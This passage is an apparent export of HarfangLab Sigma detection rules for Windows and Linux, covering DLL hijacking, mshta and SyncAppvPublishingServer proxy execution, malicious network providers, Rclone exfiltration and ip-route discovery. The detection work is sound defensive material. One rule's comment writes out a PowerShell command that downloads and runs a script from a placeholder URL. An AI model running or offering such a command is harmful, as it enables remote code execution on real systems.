"content": "title: DLL Hijacking via dwm.exe\nid: b6be76e7-26f5-4dea-995f-08163fda806c\ndescription: |\n Detects potential Windows DLL Hijacking via dwm.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CoreMessaging.dll'\n - '\\coreuicomponents.dll'\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\D3DCOMPILER_47.dll'\n - '\\dwmcore.dll'\n - '\\dxgi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6be76e7-26f5-4dea-995f-08163fda806c",
"rule_name": "DLL Hijacking via dwm.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dwm.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6c4d3fc-ca0b-4f9f-bf52-c889a39fbf40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080432Z",
"creation_date": "2026-03-23T11:45:34.080434Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080438Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://medium.com/@djordje.brankovic/inside-a-fake-captcha-phishing-attack-how-attackers-use-mshta-exe-and-powershell-to-deliver-xworm-cc7cdfda95ce",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_mshta_powershell.yml",
"content": "title: PowerShell Execution via mshta.exe\nid: b6c4d3fc-ca0b-4f9f-bf52-c889a39fbf40\ndescription: |\n Detects the execution of PowerShell via mshta.exe.\n Mshta can be used to proxy the execution of a malicious content through a trusted Windows utility.\n It is recommended to analyze the content of the file executed by mshta.exe as well as to investigate the command executed by the PowerShell process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://medium.com/@djordje.brankovic/inside-a-fake-captcha-phishing-attack-how-attackers-use-mshta-exe-and-powershell-to-deliver-xworm-cc7cdfda95ce\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2025/04/25\nmodified: 2025/04/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\powershell.exe'\n ParentImage|endswith: '\\mshta.exe'\n CurrentDirectory|contains:\n - '?:\\Windows\\Temp\\'\n - '?:\\windows\\system32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\ProgramData\\'\n - '?:\\Users\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6c4d3fc-ca0b-4f9f-bf52-c889a39fbf40",
"rule_name": "PowerShell Execution via mshta.exe",
"rule_description": "Detects the execution of PowerShell via mshta.exe.\nMshta can be used to proxy the execution of a malicious content through a trusted Windows utility.\nIt is recommended to analyze the content of the file executed by mshta.exe as well as to investigate the command executed by the PowerShell process.\n",
"rule_creation_date": "2025-04-25",
"rule_modified_date": "2025-04-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6e34025-c8bb-4d31-b753-65184d578ae6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072865Z",
"creation_date": "2026-03-23T11:45:34.072868Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072889Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/",
"https://twitter.com/andreanaspi/status/1634284600422813703",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_syncappvpublishingserver_vbs.yml",
"content": "title: Suspicious Proxy Execution via SyncAppvPublishingServer.vbs\nid: b6e34025-c8bb-4d31-b753-65184d578ae6\ndescription: |\n Detects the use of SyncAppvPublishingServer.vbs which is used by Microsoft Application Virtualization (App-V).\n This VBS script can be used as a PowerShell host to execute PowerShell code and should never be in use unless App-V is deployed.\n Attackers may abused it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities, as well as for other malicious actions stemming from SyncAppvPublishingServer.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/\n - https://twitter.com/andreanaspi/status/1634284600422813703\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/09/04\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Syncappvpublishingserver\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # SyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX\"\n CommandLine|contains|all:\n - 'SyncAppvPublishingServer.vbs'\n - 'n;'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6e34025-c8bb-4d31-b753-65184d578ae6",
"rule_name": "Suspicious Proxy Execution via SyncAppvPublishingServer.vbs",
"rule_description": "Detects the use of SyncAppvPublishingServer.vbs which is used by Microsoft Application Virtualization (App-V).\nThis VBS script can be used as a PowerShell host to execute PowerShell code and should never be in use unless App-V is deployed.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities, as well as for other malicious actions stemming from SyncAppvPublishingServer.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b713fdb6-4c07-4d42-ae5c-44b619b0a4d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075583Z",
"creation_date": "2026-03-23T11:45:34.075585Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075590Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.scip.ch/en/?labs.20220217",
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/Get-NetworkProviders.ps1",
"https://attack.mitre.org/techniques/T1556/008/"
],
"name": "t1556_008_network_provider.yml",
"content": "title: Network Provider Installed\nid: b713fdb6-4c07-4d42-ae5c-44b619b0a4d5\ndescription: |\n Detects the installation of a new Network Provider.\n Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.\n Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process.\n You may use the Get-NetworkProviders.ps1 script in the rule's references to list all registered network providers. It is recommended to determine if they are legitimate.\nreferences:\n - https://www.scip.ch/en/?labs.20220217\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/Get-NetworkProviders.ps1\n - https://attack.mitre.org/techniques/T1556/008/\ndate: 2023/08/08\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1556.008\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\NetworkProvider\\ProviderPath'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - '\"\"'\n\n exclusion_system:\n ProcessImage|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_cbfs:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Tresorit\\v*\\cbfs-installer.exe'\n\n exclusion_vbox_additions:\n ProcessImage|endswith: '\\VBoxWindowsAdditions-amd64.exe'\n Details: '?:\\windows\\system32\\VBoxMRXNP.dll'\n\n exclusion_citrix:\n Details:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\x64\\pnsson.dll'\n - '?:\\Program Files (x86)\\Citrix\\Online Plugin\\x64\\pnsson.dll'\n\n exclusion_ibm:\n Details: '?:\\Program Files (x86)\\IBM\\Client Access\\Shared\\Cwbnetnt.dll'\n\n exclusion_tiworker:\n ProcessImage: '?:\\Windows\\WinSxS\\\\*\\TiWorker.exe'\n Details:\n - '%SystemRoot%\\System32\\nfsnp.dll'\n - '%SystemRoot%\\System32\\p9np.dll'\n\n exclusion_iprint:\n Details: '?:\\Program Files\\Novell\\iPrint\\iPrntWinCredMan.dll'\n\n exclusion_tun:\n - Details: '?:\\WINDOWS\\system32\\WLPRNPNT.DLL'\n ProcessImage|endswith: '\\TunPlus\\setup.exe'\n - Details: '?:\\WINDOWS\\system32\\WLPRNPNT.DLL'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\TunLprNP\\NetworkProvider\\ProviderPath'\n\n exclusion_regedit:\n ProcessImage: '?:\\Windows\\regedit.exe'\n Details:\n - '%SystemRoot%\\System32\\ntlanman.dll'\n - '%SystemRoot%\\System32\\davclnt.dll'\n - '?:\\WINDOWS\\SysWOW64\\f5netprov64.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b713fdb6-4c07-4d42-ae5c-44b619b0a4d5",
"rule_name": "Network Provider Installed",
"rule_description": "Detects the installation of a new Network Provider.\nNetwork provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.\nAdversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process.\nYou may use the Get-NetworkProviders.ps1 script in the rule's references to list all registered network providers. It is recommended to determine if they are legitimate.\n",
"rule_creation_date": "2023-08-08",
"rule_modified_date": "2025-11-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1556.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b728c5bc-b31e-4562-8186-147846992e1c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591967Z",
"creation_date": "2026-03-23T11:45:34.591971Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591979Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SBousseaden/status/1550903546916311043",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rasphone.yml",
"content": "title: DLL Hijacking via rasphone.exe\nid: b728c5bc-b31e-4562-8186-147846992e1c\ndescription: |\n Detects potential Windows DLL Hijacking via rasphone.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/SBousseaden/status/1550903546916311043\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rasphone.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\connect.dll'\n - '\\credui.dll'\n - '\\dui70.dll'\n - '\\eappcfg.dll'\n - '\\iphlpapi.dll'\n - '\\netsetupapi.dll'\n - '\\netshell.dll'\n - '\\rasgcw.dll'\n - '\\rtutils.dll'\n - '\\sspicli.dll'\n - '\\twinapi.dll'\n - '\\xwizards.dll'\n - '\\xwtpw32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b728c5bc-b31e-4562-8186-147846992e1c",
"rule_name": "DLL Hijacking via rasphone.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rasphone.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b728f2c6-97c2-49a1-8620-a424f5d582d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610831Z",
"creation_date": "2026-03-23T11:45:34.610835Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610842Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/rclone-mega-extortion/",
"https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
"https://attack.mitre.org/techniques/T1567/002/",
"https://attack.mitre.org/software/S1040/"
],
"name": "t1567_002_rclone_configuration_created.yml",
"content": "title: New Rclone Configuration Created\nid: b728f2c6-97c2-49a1-8620-a424f5d582d9\ndescription: |\n Detects the creation of a new Rclone configuration file.\n Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.\n It is recommended to investigate the process for suspicious activities and search for any cybercrime-related activities on other hosts.\nreferences:\n - https://redcanary.com/blog/rclone-mega-extortion/\n - https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\n - https://attack.mitre.org/techniques/T1567/002/\n - https://attack.mitre.org/software/S1040/\ndate: 2021/09/30\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1048.002\n - attack.t1048.003\n - attack.s1040\n - classification.Windows.Source.Filesystem\n - classification.Windows.Tool.Rclone\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|startswith: '?:\\Users\\\\*\\.config\\rclone\\'\n condition: selection\nlevel: low\n# level: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b728f2c6-97c2-49a1-8620-a424f5d582d9",
"rule_name": "New Rclone Configuration Created",
"rule_description": "Detects the creation of a new Rclone configuration file.\nRclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.\nIt is recommended to investigate the process for suspicious activities and search for any cybercrime-related activities on other hosts.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.002",
"attack.t1048.003",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b7865333-71e3-4f99-be6c-df2db775b39d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.541106Z",
"creation_date": "2026-03-23T11:45:34.603491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603498Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/ip-route.8.html",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_ip_route.yml",
"content": "title: IP Route Execution\nid: b7865333-71e3-4f99-be6c-df2db775b39d\ndescription: |\n Detects the execution of the IP route utility to display the routing table management.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate other actions taken by this user in their session.\nreferences:\n - https://man7.org/linux/man-pages/man8/ip-route.8.html\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ip'\n CommandLine|contains: ' r' # route\n ParentImage|contains: '?'\n\n exclusion_not_show:\n CommandLine|contains:\n - ' add'\n - ' change'\n - ' replace'\n - ' delete'\n - ' flush'\n - ' get'\n - ' restore'\n - ' rule'\n\n exclusion_openvpn:\n - ProcessImage: '/usr/sbin/openvpn'\n - ProcessParentImage: '/usr/sbin/openvpn'\n\n exclusion_avahi:\n ParentCommandLine:\n - '/bin/sh /etc/network/if-up.d/avahi-autoipd'\n - '/bin/sh /etc/avahi/avahi-autoipd.action *'\n - '/bin/sh /usr/lib/avahi/avahi-daemon-check-dns.sh'\n\n exclusion_i3status:\n ParentImage: '/usr/bin/i3status-rs'\n\n exclusion_puppet:\n - ParentImage:\n - '*/puppetlabs/puppet/bin/ruby'\n - '*/puppetlabs/puppet/bin/facter'\n - ParentCommandLine:\n - '/bin/sh /opt/puppetlabs/bin/facter --puppet --json'\n - '/opt/puppetlabs/server/apps/puppetserver/puppet-server-release.jar'\n - '/usr/bin/ruby /usr/bin/puppet agent *'\n - '/bin/sh /opt/puppetlabs/bin/puppet *'\n - '/usr/bin/ruby /usr/bin/facter *'\n - GrandparentImage:\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/opt/puppetlabs/puppet/bin/facter'\n - GrandparentCommandLine: '/usr/bin/ruby /usr/bin/puppet agent *'\n\n exclusion_facter:\n - ParentImage: '/usr/bin/facter'\n - ParentCommandLine:\n - 'sh -c /usr/bin/facter 2>/dev/null'\n - '/usr/bin/ruby /usr/bin/facter'\n - '/usr/bin/ruby /usr/bin/facter --*'\n\n exclusion_insights:\n CommandLine: '/sbin/ip route show table all'\n ParentImage: '/usr/bin/timeout'\n\n exclusion_insights_client:\n ParentCommandLine:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py *'\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py *'\n\n exclusion_sosreport:\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_ocsinventory1:\n ParentCommandLine|startswith:\n # /usr/bin/perl /usr/bin/ocsinventory-agent --force\n # /usr/bin/perl /usr/sbin/ocsinventory-agent --wait 100\n - '/usr/bin/perl /usr/bin/ocsinventory-agent'\n - '/usr/bin/perl /usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl /usr/local/bin/ocsinventory-agent'\n exclusion_ocsinventory2:\n GrandparentCommandLine|startswith:\n # /usr/bin/perl /usr/bin/ocsinventory-agent --force\n # /usr/bin/perl /usr/sbin/ocsinventory-agent --wait 100\n - '/usr/bin/perl /usr/bin/ocsinventory-agent'\n - '/usr/bin/perl /usr/sbin/ocsinventory-agent'\n - '/usr/bin/perl /usr/local/bin/ocsinventory-agent'\n\n exclusion_hyperv:\n GrandparentImage:\n - '/usr/sbin/hypervkvpd'\n - '/usr/sbin/hv_kvp_daemon'\n\n exclusion_qualys:\n GrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_gitlab:\n - ParentCommandLine|contains: '/opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin'\n - GrandparentCommandLine: '/bin/bash /opt/gitlab/bin/gitlab-ctl reconfigure'\n - GrandparentImage|startswith: '/opt/gitlab/embedded/bin/'\n\n exclusion_udscan:\n - ParentImage: '/opt/microfocus/Discovery/.discagnt/udscan'\n - ProcessAncestors|contains: '|/opt/microfocus/Discovery/.discagnt/udscan|'\n\n exclusion_pacemaker_1:\n CurrentDirectory|startswith: '/var/lib/pacemaker/'\n GrandparentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n\n exclusion_pacemaker_2:\n CurrentDirectory|startswith: '/var/lib/pacemaker/'\n ParentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n\n exclusion_pacemaker_3:\n ParentImage: '/usr/libexec/pacemaker/pacemaker-execd'\n\n exclusion_ocsinventory:\n ParentCommandLine: '/bin/bash /etc/cron.*/ocsinventory-agent'\n\n exclusion_ovirt:\n ParentImage|startswith: '/usr/lib/jvm/java-??-openjdk-'\n ParentCommandLine|startswith: 'ovirt-engine '\n\n exclusion_filemaker:\n ParentCommandLine|contains: 'sh -c ip route '\n GrandparentImage: '/opt/FileMaker/FileMaker Server/Admin/FAC/facstart.sh'\n\n exclusion_microk8s:\n Image: '/snap/microk8s/*/bin/ip'\n\n exclusion_oracle:\n ParentCommandLine: '*/tmp/CVU_*_resource/exectask* -getIfInfo*'\n\n exclusion_node:\n ParentImage|endswith: '/bin/node'\n CommandLine:\n - 'ip -6 r'\n - 'ip -4 r'\n\n exclusion_salt:\n ParentCommandLine|contains:\n - '/usr/lib/venv-salt-minion/*/bin/salt-minion*'\n - '/var/tmp/.root_??????_salt/salt-call *'\n - '/usr/bin/salt-master'\n - '/usr/bin/salt-minion'\n - '/usr/bin/salt-call'\n\n exclusion_fogproject:\n GrandparentCommandLine: 'php /opt/fog/service/FOGMulticastManager/FOGMulticastManager'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C 